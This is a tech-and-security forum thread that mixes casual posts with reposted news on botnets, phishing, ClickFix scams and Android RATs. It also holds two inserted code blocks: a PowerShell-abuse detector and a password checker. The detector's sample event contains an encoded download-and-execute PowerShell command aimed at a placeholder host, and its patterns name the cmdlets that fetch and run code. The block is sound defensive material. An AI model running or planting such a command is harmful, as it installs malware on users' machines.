The General thread for Computers And Internet

Foggy
Dick Tater
Posts: 10116
Joined: Mon Feb 22, 2021 8:45 am
Location: Fogbow HQ
Occupation: Dick Tater/Space Cadet
Verified: and it's really me


#351

Post by Foggy »

As I understood it, the smart grid wasn't just about circuit protection, but was about instantaneous adjustment of the entire national electrical grid based on changing conditions, and about who took the load when demand spiked. Back in 2008 when I read about it, they said that outages of electricity averaged many hours per year in the US, but in Japan and Europe it was just minutes. But maybe things have changed without me knowing. My home averages a lot of flickering power outages throughout every year, and they aren't lessening. I mean, I use UPSs and all, but power distribution is still an issue in this great land of ours.
Foggy
Dick Tater
Posts: 10116
Joined: Mon Feb 22, 2021 8:45 am
Location: Fogbow HQ
Occupation: Dick Tater/Space Cadet
Verified: and it's really me


#352

Post by Foggy »

And if computer related businesses use up all the power available on the grid, what happens then? :confuzzled:

I don't think we're at too much risk in NC, Virginia is the state with all the server farms and so forth, but I am interested in this stuff, even though my knowledge level is zero.

But can NC be affected by a national or regional outage, due to overuse of electricity by the computer companies?
Reality Check
Posts: 2351
Joined: Mon Feb 22, 2021 3:46 pm
Verified: ✅ Curmudgeon

#353

Post by Reality Check »

The grid control and protection system and related. The protective relays are like the front line in controlling the grid. In addition to the relays, most stations now have other power monitors that allow for real-time power flow data, logging and other SCADA functions.

One issue with the US is there is not one big grid controlled from one central location. It is divided into regions that are interconnected but each region is controlled at a regional center. The strength of the interconnections varies. For example the grid in Texas is primarily controlled by ERCOT (Electrical Reliability Council of Texas). They have always maintained weak inter-ties with other regions somewhat based on the hubris that we do it better in Texas. This bit them in the ass a few years ago when a record cold snap froze up all their poorly protected generating plants and enough power could not be imported to maintain a stable grid.
Reality Check
Posts: 2351
Joined: Mon Feb 22, 2021 3:46 pm
Verified: ✅ Curmudgeon

#354

Post by Reality Check »

I think electric vehicles are a larger threat to the grid than bit miners. Replacing all that energy from gasoline fossil fuel with electrons from the grid is a big hunk to pick up.
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#355

Post by RTH10260 »

Treasury Sanctions Creators of 911 S5 Proxy Botnet

May 28, 2024

The U.S. Department of the Treasury today unveiled sanctions against three Chinese nationals for allegedly operating 911 S5, an online anonymity service that for many years was the easiest and cheapest way to route one’s Web traffic through malware-infected computers around the globe. KrebsOnSecurity identified one of the three men in a July 2022 investigation into 911 S5, which was massively hacked and then closed ten days later.

The 911 S5 botnet-powered proxy service, circa July 2022.

From 2015 to July 2022, 911 S5 sold access to hundreds of thousands of Microsoft Windows computers daily, as “proxies” that allowed customers to route their Internet traffic through PCs in virtually any country or city around the globe — but predominantly in the United States.

911 built its proxy network mainly by offering “free” virtual private networking (VPN) services. 911’s VPN performed largely as advertised for the user — allowing them to surf the web anonymously — but it also quietly turned the user’s computer into a traffic relay for paying 911 S5 customers.

911 S5’s reliability and extremely low prices quickly made it one of the most popular services among denizens of the cybercrime underground, and the service became almost shorthand for connecting to that “last mile” of cybercrime. Namely, the ability to route one’s malicious traffic through a computer that is geographically close to the consumer whose stolen credit card is about to be used, or whose bank account is about to be emptied.

In July 2022, KrebsOnSecurity published a deep dive into 911 S5, which found the people operating this business had a history of encouraging the installation of their proxy malware by any means available. That included paying affiliates to distribute their proxy software by secretly bundling it with other software.



https://krebsonsecurity.com/2024/05/tre ... xy-botnet/
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#356

Post by RTH10260 »

Surge in Discord Malware Attacks as 50,000 Malicious Links Uncovered

WAQAS
MAY 29, 2024

Cybersecurity researchers at Bitdefender have found a surge in malware and phishing attacks on Discord, noting 50,000 malicious links in the last six months, with US users being the most targeted.

In a recent six-month analysis, cybersecurity firm Bitdefender has uncovered a troubling trend: cybercriminals are using Discord, a popular communication platform, to distribute malware and execute phishing campaigns.

The report, shared with Hackread.com by Bitdefender ahead of publishing on Wednesday 29, 2024, highlights over 50,000 malicious links identified on Discord, showing the platform’s growing vulnerability to cyber threats.

Key Findings

Malware and Phishing Dominate: Malware and phishing links make up a combined 39% of the detected malicious links. These attacks often involve deceitful tactics to trick users into downloading harmful software or providing sensitive information.

US Users Most Targeted: Users in the United States are particularly at risk, accounting for 16.2% of the threats. This makes them the most targeted group by a significant margin. Other countries targeted through malicious campaigns through Discord include France, Romania, the United Kingdom, and Germany.

Fake Offers of Discord Nitro: A common scam involves fake offers of free Discord Nitro, a premium subscription service. Users are lured in by the promise of free upgrades, only to be targeted by phishing or malware attacks.

These findings should not come as a surprise, as Discord has a history of malicious activities. In February of last year, cyber criminals were found exploiting the platform to spread PureCrypter malware, which targeted government organizations and entities in North America and the Asia-Pacific region.



https://hackread.com/discord-malware-at ... ous-links/
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#357

Post by RTH10260 »

Proofpoint exposes AFF scammers’ piano gambit
Ransomware and nation state actors dominate the headlines, but fraud and scams still net career cyber criminals thousands from unsuspecting members of the public. Proofpoint reports on a campaign targeting victims of a musical inclination

Alex Scroxton, Security Editor
Published: 29 May 2024 16:45

A phishing campaign targeting, of all things, people who might be interested in buying a second-hand piano, may have netted the scam operation behind it over $900,000, according to researchers at email security specialist Proofpoint.

The email campaign seems to have started in January 2024, and is ongoing. It forms the precursor to an advance fee fraud (AFF) scam, a type of fraud usually targeting private individuals, rather than organisations, in which victims are offered money, products or services, offered the opportunity to take advantage of an incredible deal that never materialises, or asked for help retrieving funds from another country.

Generally, victims will be baited with elaborate stories into making a small payment – or advance fee – to receive the promised goods or services. Needless to say, once the victim has paid up, nothing ever materialises.

They are generally run by financially motivated cyber criminals, and due to the fact so many of them seem to originate from Nigeria, are often known as 419 scams, after the relevant section of Nigerian law that deals with such matters.

They often exploit current concerns and events, which at first glance makes the use of such a specific lure somewhat unusual. However, wrote the Proofpoint team, comprising Tim Kromphardt and Selena Larson, there may be some specific targeting at play.

“Most of the messages target students and faculty at colleges and universities in North America, however other targeting of industries including healthcare and food and beverage services was also observed,” they wrote. “Proofpoint observed at least 125,000 messages so far this year associated with the piano scam campaigns cluster.

“In the campaigns, the threat actor purports to offer up a free piano, often due to alleged circumstances like a death in the family,” they continued. “When a target replies, the actor instructs them to contact a shipping company to arrange delivery. That contact address will also be a fake email managed by the same threat actor. The ‘shipping company’ then claims they will send the piano if the recipient sends them the money for shipping first.”



https://www.computerweekly.com/news/366 ... ano-gambit
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#358

Post by RTH10260 »

about an incident that happened in October 2023
Mysterious Cyber Attack Took Down 600,000+ Routers in the U.S.

May 31, 2024
Newsroom | Network Security / Cyber Attack

More than 600,000 small office/home office (SOHO) routers are estimated to have been bricked and taken offline following a destructive cyber attack staged by unidentified cyber actors, disrupting users' access to the internet.

The mysterious event, which took place between October 25 and 27, 2023, and impacted a single internet service provider (ISP) in the U.S., has been codenamed Pumpkin Eclipse by the Lumen Technologies Black Lotus Labs team. It specifically affected three router models issued by the ISP: ActionTec T3200, ActionTec T3260, and Sagemcom.

"The incident took place over a 72-hour period between October 25-27, rendered the infected devices permanently inoperable, and required a hardware-based replacement," the company said in a technical report.

The blackout is significant, not least because it led to the abrupt removal of 49% of all modems from the impacted ISP's autonomous system number (ASN) during the time-frame.

While the name of the ISP was not disclosed, evidence points to it being Windstream, which suffered an outage around the same time, causing users to report a "steady red light" being displayed by the impacted modems.



https://thehackernews.com/2024/05/myste ... -down.html
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#359

Post by RTH10260 »

New York passes laws protecting kids from addictive social media content
Legislation will limit children’s exposure to computer algorithmic social media feeds and protect their privacy

Edward Helmore
Sat 8 Jun 2024 12.00 CEST

New York state took novel legislative steps on Friday to limit children’s exposure to computer algorithmic social media feeds, passing two laws to protect children from addictive social media content and to protect their privacy.

The Stop Addictive Feeds Exploitation (Safe) for Kids Act requires social media companies to restrict addictive feeds on their platforms for users under 18 unless parental consent is granted, and prohibits companies from sending notifications regarding addictive feeds to minors from 12.00am to 6.00am.

The second law, the New York Child Data Protection Act, prohibits online sites from collecting, using, sharing or selling personal data of anyone under the age of 18, unless they receive informed consent or unless doing so is necessary for the purpose of the website.



https://www.theguardian.com/us-news/art ... y-children
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#360

Post by RTH10260 »

:confuzzled: what's an "addictive feed" :?:
tek
Posts: 2337
Joined: Mon Feb 22, 2021 10:15 am


#361

Post by tek »

RTH10260 wrote: Sat Jun 08, 2024 8:59 am :confuzzled: what's an "addictive feed" :?:
Potato chips :mrgreen:
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#362

Post by RTH10260 »

Microsoft in damage-control mode, says it will prioritize security over AI
Microsoft CEO Satya Nadella is now personally responsible for security flaws.

ASHLEY BELANGER -
6/13/2024, 10:38 PM

Microsoft is pivoting its company culture to make security a top priority, President Brad Smith testified to Congress on Thursday, promising that security will be "more important even than the company’s work on artificial intelligence."

Satya Nadella, Microsoft's CEO, "has taken on the responsibility personally to serve as the senior executive with overall accountability for Microsoft’s security," Smith told Congress.

His testimony comes after Microsoft admitted that it could have taken steps to prevent two aggressive nation-state cyberattacks from China and Russia.

According to Microsoft whistleblower Andrew Harris, Microsoft spent years ignoring a vulnerability while he proposed fixes to the "security nightmare." Instead, Microsoft feared it might lose its government contract by warning about the bug and allegedly downplayed the problem, choosing profits over security, ProPublica reported.

This apparent negligence led to one of the largest cyberattacks in US history, and officials' sensitive data was compromised due to Microsoft's security failures. The China-linked hackers stole 60,000 US State Department emails, Reuters reported. And several federal agencies were hit, giving attackers access to sensitive government information, including data from the National Nuclear Security Administration and the National Institutes of Health, ProPublica reported. Even Microsoft itself was breached, with a Russian group accessing senior staff emails this year, including their "correspondence with government officials," Reuters reported.

"We acknowledge that we can and must do better," Smith told Congress today, according to his prepared written testimony. "As a company, we need to strive for perfection in protecting this nation’s cybersecurity. Any day we fall short is a bad day for cybersecurity and a terrible moment at Microsoft."



https://arstechnica.com/tech-policy/202 ... y-over-ai/
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#363

Post by RTH10260 »

Background post on the mentioned security vulnerability
Microsoft Chose Profit Over Security and Left U.S. Government Vulnerable to Russian Hack, Whistleblower Says
Former employee says software giant dismissed his warnings about a critical flaw because it feared losing government business. Russian hackers later used the weakness to breach the National Nuclear Security Administration, among others.

by Renee Dudley, with research by Doris Burke
June 13, 5 a.m. EDT

Microsoft hired Andrew Harris for his extraordinary skill in keeping hackers out of the nation’s most sensitive computer networks. In 2016, Harris was hard at work on a mystifying incident in which intruders had somehow penetrated a major U.S. tech company.

The breach troubled Harris for two reasons. First, it involved the company’s cloud — a virtual storehouse typically containing an organization’s most sensitive data. Second, the attackers had pulled it off in a way that left little trace.



https://www.propublica.org/article/micr ... an-hackers
keith
Posts: 3977
Joined: Mon Feb 22, 2021 10:23 pm
Location: The Swamp in Victorian Oz
Occupation: Retired Computer Systems Analyst Project Manager Super Coder
Verified: ✅lunatic


#364

Post by keith »

So I've been emptying boxes of wires and wall warts, spreading 'em out on the floor to figure out what is what and what is going to the recyclers.

I 'just' (3 hours ago) got distracted - I found the cables for my old Palm Pilots. I think I got a 3 and a 5. I'm staring at the 3 but I got the Pilot 5 connected and hot synching with Windows 11. Works great.

But I'm synching to the Palm Desktop, synching to Outlook365 is an adventure for another day.
Also Not connecting to the WWW - the old WiFi would be too dangerous, but I might try the bluetooth option.

I'm just wondering what I'll use it for...
Edit: OK, what I thought was a Pilot III (3) is the Pilot V (5) - the battery appears to be dead. It works great on the charging stand, but loses everything when removed.
What I thought was the Pilot V is the Pilot Tx. And it works great and is even in pretty colors.
Be assured that a walk through the ocean of most souls Would scarcely get your feet wet
keith
Posts: 3977
Joined: Mon Feb 22, 2021 10:23 pm
Location: The Swamp in Victorian Oz
Occupation: Retired Computer Systems Analyst Project Manager Super Coder
Verified: ✅lunatic


#365

Post by keith »

SWMBO just got a new laptop for her birthday. It's nice, she mostly picked it out for herself, with very little nagging from me.

It's a midrange (I guess) MSI 'gaming' (she doesn't do gaming) machine with an Intel I5 cpu. I think it's a pretty good machine for her.

So I'm setting it up. Made the mistake of using an existing Microsoft Account so it fires up with my name on the front screen instead of hers.

I ran BelArc Advisor to see what bloatware was there. Norton 360 of course - N360 requires a completely different removal tool than 'plain' Norton. Make sure you get the right one. They are both named 'NRnR' or something like that. (I found N360 on MY desktop too, I had used the wrong removal tool after the rebuild)

Installed AVG and IOBit Uninstaller. IOBit asked me to review installed programs and delete unneeded ones. It found a couple that I didn't see on BelArc.

- Killer Performance Driver Suite for Windows (had to look it up - it's some kind of network drivers that override the Microsoft drivers supposedly for gamers, but slow down network performance for non-gamer experience) - fuck that.

- Tobii Experience Software For Windows - eyetracking software for gamers - fuck that too.

[whinge]
I SHOULDN'T HAVE TO LOOK UP THIS STUFF TO FIND OUT WHAT IT IS FOR AND IF I NEED IT OR NOT.

ALL BLOATWARE SHOULD BE DESCRIBED IN FULL IN THE LITERATURE THAT COMES WITH THE MACHINE.
[/whinge]
Be assured that a walk through the ocean of most souls Would scarcely get your feet wet
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#366

Post by RTH10260 »

US bans sales of Kaspersky antivirus software over Russia ties
Washington says Moscow’s influence over company poses significant risk, as Kaspersky argues its activities do not threaten US security

Agence France-Presse
Fri 21 Jun 2024 04.42 CEST

Joe Biden’s administration has banned Russia-based cybersecurity firm Kaspersky from providing its popular antivirus products in the US over national security concerns.

“Kaspersky will generally no longer be able to, among other activities, sell its software within the United States or provide updates to software already in use,” said a commerce department statement. The announcement came after a lengthy investigation found Kaspersky’s “continued operations in the United States presented a national security risk due to the Russian government’s offensive cyber capabilities and capacity to influence or direct Kaspersky’s operations”.

The US commerce secretary, Gina Raimondo, said: “Russia has shown time and again they have the capability and intent to exploit Russian companies, like Kaspersky Lab, to collect and weaponise sensitive US information.”



https://www.theguardian.com/us-news/art ... ussia-ties
bill_g
Posts: 5962
Joined: Mon Feb 22, 2021 5:52 pm
Location: Portland OR
Occupation: Retired (kind of)
Verified: ✅ Checked Republic ✓ ᵛᵉʳᶦᶠᶦᵉᵈ


#367

Post by bill_g »

Russian software on a Chinese made computer. Hmm ....
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#368

Post by RTH10260 »

Wells Fargo Fires Employees Over "Mouse Jigglers"

BY TYLER DURDEN
FRIDAY, JUN 14, 2024 - 11:44 AM

In the era of hybrid work, with employees splitting their time between two days in the office and three days working remotely, employers have ramped up using productivity monitoring software. However, employees have outsmarted some of these surveillance programs with gadgets like mouse movers, otherwise known as 'mouse jigglers.'

The popularity of mouse jigglers has exploded on TikTok in the last several years. Firms have been cracking down on these devices following a surge in fake work activity, which has weighed on productivity.

Wells Fargo, in a new disclosure with the Financial Industry Regulatory Authority, first reported by Bloomberg, had terminated over a dozen employees in its wealth- and investment-management unit for their use of mouse jigglers.

They were "discharged after review of allegations involving simulation of keyboard activity creating the impression of active work," according to the disclosures.

On Amazon, some of the top-ranking mouse jigglers sold have thousands of reviews and range in price between $6 and $25.




https://www.zerohedge.com/technology/we ... e-jigglers
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#369

Post by RTH10260 »

Fake Google Chrome errors trick you into running malicious PowerShell scripts

By Bill Toulas
June 17, 2024 06:31 PM

A new malware distribution campaign uses fake Google Chrome, Word, and OneDrive errors to trick users into running malicious PowerShell "fixes" that install malware.

The new campaign was observed being used by multiple threat actors, including those behind ClearFake, a new attack cluster called ClickFix, and the TA571 threat actor, known for operating as a spam distributor that sends large volumes of email, leading to malware and ransomware infections.

Previous ClearFake attacks utilize website overlays that prompt visitors to install a fake browser update that installs malware.

Threat actors also utilize JavaScript in HTML attachments and compromised websites in the new attacks. However, now the overlays display fake Google Chrome, Microsoft Word, and OneDrive errors.

These errors prompt the visitor to click a button to copy a PowerShell "fix" into the clipboard and then paste and run it in a Run: dialog or PowerShell prompt.

"Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk," warns a new report from ProofPoint.

The payloads seen by Proofpoint include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.



https://www.bleepingcomputer.com/news/s ... l-scripts/
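
A defender-side triage of the Run-dialog step described in the article above, as an added example that is not part of the original post or the Proofpoint report: it flags PowerShell started by explorer.exe with an encoded, hidden or download-and-execute command line. The event records, their field names, the example.invalid URL and the indicator names are constructed for illustration.

```python
import base64
import ntpath
import re


def encode_ps(script: str) -> str:
    """Encode text the way PowerShell's -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


EXPLORER = r"C:\Windows\explorer.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation records (fields loosely follow Sysmon Event ID 1).
# Paths, payloads and the agent name are invented for this example.
SAMPLE_EVENTS = [
    {"id": 1, "parent": EXPLORER, "image": POWERSHELL,
     "cmdline": "powershell.exe -w hidden -enc "
                + encode_ps("iex (iwr 'https://example.invalid/fix')")},
    # A user opening an interactive prompt: same parent, nothing suspicious.
    {"id": 2, "parent": EXPLORER, "image": POWERSHELL, "cmdline": "powershell.exe"},
    # Management tooling also uses encoded commands, but not via explorer.exe.
    {"id": 3, "parent": r"C:\Program Files\ExampleAgent\agent.exe", "image": POWERSHELL,
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + encode_ps("Get-Service")},
    # -ExecutionPolicy starts with "e" but is not a prefix of -EncodedCommand.
    {"id": 4, "parent": EXPLORER, "image": POWERSHELL,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\alice\report.ps1"},
    {"id": 5, "parent": EXPLORER, "image": POWERSHELL,
     "cmdline": "powershell.exe -ec " + encode_ps("Write-Output constructed")},
]

SHELLS = {"powershell.exe", "pwsh.exe"}
HIDDEN = re.compile(r"(?i)(?:^|\s)[-/]w\w*\s+hidden\b")
DOWNLOAD = re.compile(
    r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b")
DYNAMIC_EXEC = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")


def find_encoded_payload(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable.

    PowerShell accepts any prefix of the parameter name (-e, -en, -enc, ...)
    plus the alias -ec, so match on prefixes instead of one spelling.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()
        if tok[0] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except ValueError:  # covers bad base64 and bad UTF-16
                return None
    return None


def triage(event: dict) -> list:
    """Return the reasons an event looks like a pasted 'fix'; empty list means no hit."""
    if ntpath.basename(event["image"]).lower() not in SHELLS:
        return []
    # Commands typed into the Run dialog are launched by explorer.exe.
    if ntpath.basename(event["parent"]).lower() != "explorer.exe":
        return []
    cmdline = event["cmdline"]
    decoded = find_encoded_payload(cmdline)
    # When a payload is present, inspect what it decodes to, not the base64 text.
    content = decoded if decoded is not None else cmdline
    reasons = []
    if decoded is not None:
        reasons.append("encoded_command")
    if HIDDEN.search(cmdline):
        reasons.append("hidden_window")
    if DOWNLOAD.search(content):
        reasons.append("download")
    if DYNAMIC_EXEC.search(content):
        reasons.append("dynamic_exec")
    return reasons


def flagged_ids(events=SAMPLE_EVENTS) -> list:
    return [e["id"] for e in events if triage(e)]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], triage(ev) or "no hit")
```

A command pasted into an already-open PowerShell prompt never appears on a process command line, so that variant needs PowerShell script block logging (Event ID 4104) rather than this check.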
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#370

Post by RTH10260 »

An interesting article into a corporate being hacked, the detection and removal, and a flareup of the nasty stuff. How legacy servers are dangerous, and how you must not just kill a fledgling project, but have them remove all traces from the systems.
China's 'Velvet Ant' APT Nests Inside Multiyear Espionage Effort
The campaign is especially notable for the remarkable lengths to which the threat actor went to maintain persistence on the target environment.

Jai Vijayan, Contributing Writer
June 17, 2024

Researchers have uncovered a quiet multiyear campaign by China's Velvet Ant cyber-espionage group to steal critical data from a large company in East Asia.

What makes the campaign noteworthy is the extent to which the threat actor managed to maintain persistence on the victim's network despite repeated eradication attempts.

Researchers from Sygnia who finally booted the threat actor out of the organization's environment attributed at least part of Velvet Ant's persistence to its success at finding and infecting numerous legacy and unmonitored systems on the target network.



https://www.darkreading.com/cyberattack ... -espionage
Foggy
Dick Tater
Posts: 10116
Joined: Mon Feb 22, 2021 8:45 am
Location: Fogbow HQ
Occupation: Dick Tater/Space Cadet
Verified: and it's really me


#371

Post by Foggy »

My Google Fiber is showing the following:

Ping: 2 ms
Jitter: 0 ms
Download: 947.9 mbps
Upload: 949.0 mbps

Room for improvement on that download speed ;) and I gotta get a new Range Extender, because this one won't connect to the network.

Then some idiot in an Amazon truck comes along and cuts our cable ... :mad:
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#372

Post by RTH10260 »

Many Passwords Can Be Cracked in Under an Hour, Study Finds
If your passwords are simple, you might be at risk.

Saturday, June 22, 2024

If you're not using strong, random passwords, your accounts might be more vulnerable than you think. A recent study by cybersecurity firm Kaspersky shows that a lot of passwords can be cracked in less than an hour due to advancements in computer processing power.

Kaspersky's research team used a massive database of 193 million passwords from the dark web. These passwords were hashed and salted, meaning they were somewhat protected, but still needed to be guessed. Using a powerful Nvidia RTX 4090 GPU, the researchers tested how quickly different algorithms could crack these passwords.

The results are alarming: simple eight-character passwords, made up of same-case letters and digits, could be cracked in as little as 17 seconds. Overall, they managed to crack 59% of the passwords in the database within an hour.

The team tried several methods, including the popular brute force attack, which attempts every possible combination of characters. While brute force is less effective for longer and more complex passwords, it still easily cracked many short, simple ones. They improved on brute force by incorporating common character patterns, words, names, dates, and sequences.

With the best algorithm, they guessed 45% of passwords in under a minute, 59% within an hour, and 73% within a month. Only 23% of passwords would take longer than a year to crack.

To protect your accounts, Kaspersky recommends using random, computer-generated passwords and avoiding obvious choices like words, names, or dates. They also suggest checking if your passwords have been compromised on sites like HaveIBeenPwned? and using unique passwords for different websites.

This research serves as a reminder of the importance of strong passwords in today's digital world. By taking these steps, you can significantly improve your online security and keep your accounts safe from hackers.



https://www.cysecurity.news/2024/06/man ... under.html
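
The arithmetic behind the article's figures and its advice, as an added example that is not part of the original post or Kaspersky's study: a naive brute-force estimate, a check for the predictable patterns that make that estimate meaningless, and a random generator. The guess rate is an assumption derived from the article's 17-second figure, and the word list is constructed.

```python
import re
import secrets
import string

# Assumption: the article's 17 seconds for 8 same-case letters and digits is
# taken as the time to exhaust that whole search space on the test GPU.
IMPLIED_RATE = (26 + 10) ** 8 / 17          # about 1.66e11 guesses per second
SECONDS_PER_YEAR = 365 * 24 * 3600

# Constructed mini word list; a real check would use a large breached-password list.
COMMON_WORDS = ("password", "qwerty", "summer", "admin", "welcome")


def alphabet_size(pw: str) -> int:
    """Size of the character set a plain brute-force run would have to cover."""
    size = 0
    if any(c in string.ascii_lowercase for c in pw):
        size += 26
    if any(c in string.ascii_uppercase for c in pw):
        size += 26
    if any(c in string.digits for c in pw):
        size += 10
    if any(c in string.punctuation for c in pw):
        size += len(string.punctuation)
    return size


def brute_force_seconds(pw: str, rate: float = IMPLIED_RATE) -> float:
    """Worst-case time to try every combination of this length and alphabet."""
    size = alphabet_size(pw)
    return 0.0 if size == 0 else size ** len(pw) / rate


def predictable_patterns(pw: str) -> list:
    """Patterns the article says smarter guessing exploits: words, dates, sequences."""
    low = pw.lower()
    found = []
    if any(word in low for word in COMMON_WORDS):
        found.append("word")
    if re.search(r"(?:19|20)\d{2}", pw):            # looks like a year
        found.append("date")
    if any(ord(b) - ord(a) == 1 and ord(c) - ord(b) == 1
           for a, b, c in zip(low, low[1:], low[2:])):   # abc, 123, ...
        found.append("sequence")
    if re.search(r"(.)\1{2,}", pw):                 # aaa, 111, ...
        found.append("repeat")
    return found


def assess(pw: str) -> dict:
    """Brute-force time is only an upper bound; any pattern overrides it."""
    patterns = predictable_patterns(pw)
    years = brute_force_seconds(pw) / SECONDS_PER_YEAR
    verdict = "weak" if patterns or years < 1 else "ok"
    return {"brute_force_years": years, "patterns": patterns, "verdict": verdict}


def generate_password(length: int = 16) -> str:
    """Random password from the OS CSPRNG, as the article recommends."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    for candidate in ("abc12345", "Summer2024!", generate_password()):
        print(candidate, assess(candidate))
```

`Summer2024!` shows the gap the article describes: exhaustive search over 94 characters would take centuries at this rate, yet a word plus a year is among the first things a pattern-aware guesser tries.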
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#373

Post by RTH10260 »

Red Tape Is Making Hospital Ransomware Attacks Worse
With cyberattacks increasingly targeting health care providers, an arduous bureaucratic process meant to address legal risk is keeping hospitals offline longer, potentially risking lives.

Crippling ransomware attacks against hospitals and health care providers are on the rise. These ruthless cyberattacks can take medical systems offline for weeks—canceling appointments and surgeries and causing harm to patients. Doctors and nurses are plunged into crisis situations where they resort to using pen and paper, while IT staff work to make systems safe and bring them back online. The recovery can be long-lasting and brutal.

Health care professionals, lawyers, and cybersecurity experts tell WIRED that amid the chaos caused by criminal hackers, a little-known bureaucratic process can slow down hospitals and medical providers getting their systems working again.

The red tape involves organizations hit by ransomware sending detailed “assurance” or “attestation” letters to companies that they connect their systems or software with. These letters are designed to convince organizations that it is safe to reconnect after the ransomware attack, but they can add extra pressure to those already dealing with physically and mentally draining recovery operations.

The letters aren’t required by any law and are not unique to medical organizations impacted by ransomware attacks, but experts say in situations where lives are at risk, more efficient processes should be considered. Assurance letters seen by WIRED contain up to 40 individual questions about cyberattacks and include detailed requests about how events unfolded, steps taken to respond, and any evidence that may have been gathered.

“Negotiating with hundreds of vendors each with their own unique set of requirements to reconnect was an arduous and time-consuming process,” says Sean Fitzpatrick, the vice president of external communications at Ascension, a network of 140 hospitals and thousands of affiliated providers across 19 states, which was hit by ransomware in May. Ascension now has more than 95 percent of its suppliers reconnected or in the process of reconnecting, Fitzpatrick says, and has attempted to be as transparent as possible with its recovery.




https://www.wired.com/story/ransomware- ... e-letters/
RTH10260
Posts: 15752
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot


#374

Post by RTH10260 »

Widespread Use of Rafel RAT Puts 3.9 Billion Android Devices at Risk
The new Rafel RAT is an Android malware capable of stealing data, spying on you, and even locking your phone. Keep your Android updated, download apps safely, and avoid phishing attacks to stay secure.

DEEBA AHMED
JUNE 24, 2024

In its latest research report, Check Point Research (CPR) reveals that multiple threat actors are using Rafel, a powerful open-source remote access trojan (RAT), targeting Android devices for espionage and covert intelligence operations. What’s worse: There are over 3.9 billion Android devices exposed to this threat.

One of the adversaries exploiting this RAT is APT-C-35 / DoNot Team, which used Rafel RAT for covert operations, benefiting from its remote access, surveillance, data exfiltration, and persistence mechanisms.

The DoNot Team is known for targeting Android devices. In November 2020, the group targeted Google Firebase cloud messaging to spread Android malware. In October 2021, Amnesty International blamed the DoNot Team for a malware attack against Togolese activists, attributing the attack to the Indian cybersecurity firm Innefu Labs after identifying one of the IP addresses used in the attack.

As for the latest attack, CPR collected multiple malware samples and identified 120 command and control servers. Surprisingly, Samsung phones were the most impacted devices and the US, China, and Indonesia were the most targeted countries.

“The majority of victims had Samsung phones, with Xiaomi, Vivo, and Huawei users comprising the second-largest group among the targeted victims,” CPR’s report read.

This could be due to the sheer popularity of these brands, making them a wider target base for attackers.

Over 87% of affected victims were running outdated Android versions that no longer receive security updates. These outdated systems lack critical security patches, making them easier targets for malware exploitation. Most impacted are Android 11 users, followed by Android versions 8 and 5 users.



https://hackread.com/rafel-rat-puts-3-9 ... s-at-risk/